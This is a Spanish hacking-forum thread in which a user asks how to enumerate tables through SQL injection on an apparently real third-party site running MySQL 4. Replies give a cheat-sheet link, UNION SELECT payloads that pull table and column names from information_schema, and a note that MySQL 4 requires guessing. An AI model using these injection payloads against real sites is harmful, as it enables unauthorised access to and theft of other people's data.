Autor
|
Tema: Obtener tablas con SQL Injection (mysql 4) (Leído 15,710 veces)
|
Leber
Desconectado
Mensajes: 338
"Fracta, non verba"
|
Buenas, queria saber a ver si alguien podia orientarme un poco. Llevo varias dias practicando con una bd que me cree en casa, y a ver como podia sacar datos y demas. En la v. >=5 que es la que tengo, es sencillo si tienes en cuenta informacion_schema o mysql. Pues bien, hoy me tope con una pagina, tal que asi: http://pagina_anonima.com/var.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8%20from%20userY tal tabla existe, pero no puedo averiguar su contenido, he probado con users, user, username, userid, password etc y nada. La version es 4.1.22-standardA ver si alguien puede orientarme un poco, por donde deberia de ir y seguir ratro etc. PD: Que conste que no es por hacer ningun mal, es simple curiosidad. Gracias de antemano
|
|
« Última modificación: 12 Agosto 2008, 16:46 pm por sirdarckcat »
|
En línea
|
"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
:http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/
|
|
|
En línea
|
|
|
|
Monaco
Desconectado
Mensajes: 11
|
para averiguar nombre la tabla: +union+all+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+where+table_schema+=+database()
para averiguar columnas sabiendo el nombre de la tabla: +union+all+select+1,2,column_name,4,5,6,7,8+from+information_schema.columns+where+table_name+=+char(NOMBRE DE TABLA)
Si los valores no salen a la primera tendras que ir delimitando un poco la busqueda.
Espero que haya servido un poco...
Saludos
|
|
|
En línea
|
|
|
|
tomrian
Desconectado
Mensajes: 19
|
La base de datos information_schema aparece recién en la version 5 de MySQL. Desgraciadamente (para nosotros ), en versiones anteriores, de la 4 para atras, no se cuenta con ninguna tabla por el estilo y se tiene que recurrir a la adivinación.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Informacion tablas y columnas con sql injection en mysql 4.x
Nivel Web
|
opportunity
|
4
|
6,049
|
1 Marzo 2011, 08:06 am
por opportunity
|
|
|
SQL injection, obtener mas informacion o borrara datos
Nivel Web
|
xalupeao
|
1
|
3,470
|
7 Marzo 2011, 18:31 pm
por Shell Root
|
|
|
Duda sobre conectar dos tablas en MySQL
Desarrollo Web
|
xpartano.x
|
8
|
4,745
|
10 Octubre 2011, 14:23 pm
por fran800m
|
|
|
[SOLUCIONADO] Cómo puedo obtener el diseño de las tablas por query en mysql?
Bases de Datos
|
papita5
|
2
|
4,042
|
7 Noviembre 2011, 00:06 am
por papita5
|
|
|
Eliminar tuplas o tablas a traves de SQL injection
Hacking
|
Schaiden
|
1
|
4,207
|
22 Octubre 2017, 01:17 am
por D3Maxwell
|
|